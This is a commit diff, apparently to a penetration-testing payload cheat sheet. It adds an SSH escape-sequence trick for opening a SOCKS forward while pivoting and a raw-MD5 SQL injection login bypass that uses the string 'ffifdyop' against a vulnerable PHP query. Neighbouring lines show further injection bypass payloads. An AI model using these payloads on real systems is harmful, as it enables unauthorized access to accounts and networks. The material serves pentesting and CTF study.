Raw MD5 SQL injection + SSH Konami Code

Methodology and Resources/Network Pivoting Techniques.md

@@ -25,6 +25,14 @@ ssh -N -f -D 9000 [user]@[host]
 -N : do not execute a remote command
 ```
 
+Cool Tip : Konami SSH Port forwarding
+
+```bash
+[ENTER] + [~C]
+-D 1090
+```
+
+
 ### Local Port Forwarding
 
 ```bash
@@ -124,3 +132,4 @@ python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [pro
 
 * [Network Pivoting Techniques - Bit rot](https://bitrot.sh/cheatsheet/14-12-2017-pivoting/)
 * [Port Forwarding in Windows - Windows OS Hub](http://woshub.com/port-forwarding-in-windows/)
+* [Using the SSH "Konami Code" (SSH Control Sequences) - Jeff McJunkin](https://pen-testing.sans.org/blog/2015/11/10/protected-using-the-ssh-konami-code-ssh-control-sequences)

SQL injection/README.md

@@ -293,6 +293,22 @@ admin") or "1"="1"/*
 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
 ```
 
+## Authentication Bypass (Raw MD5)
+
+When a raw md5 is used, the pass will be queried as a simple string, not a hexstring.
+
+```php
+"SELECT * FROM admin WHERE pass = '".md5($password,true)."'"
+```
+
+Allowing an attacker to craft a string with a `true` statement such as `' or 'SOMETHING`
+
+```php
+md5("ffifdyop", true) = 'or'6<>]<5D><>!r,<2C><>b
+```
+
+Challenge demo available at [http://web.jarvisoj.com:32772](http://web.jarvisoj.com:32772)
+
 ## Polyglot injection (multicontext)
 
 ```sql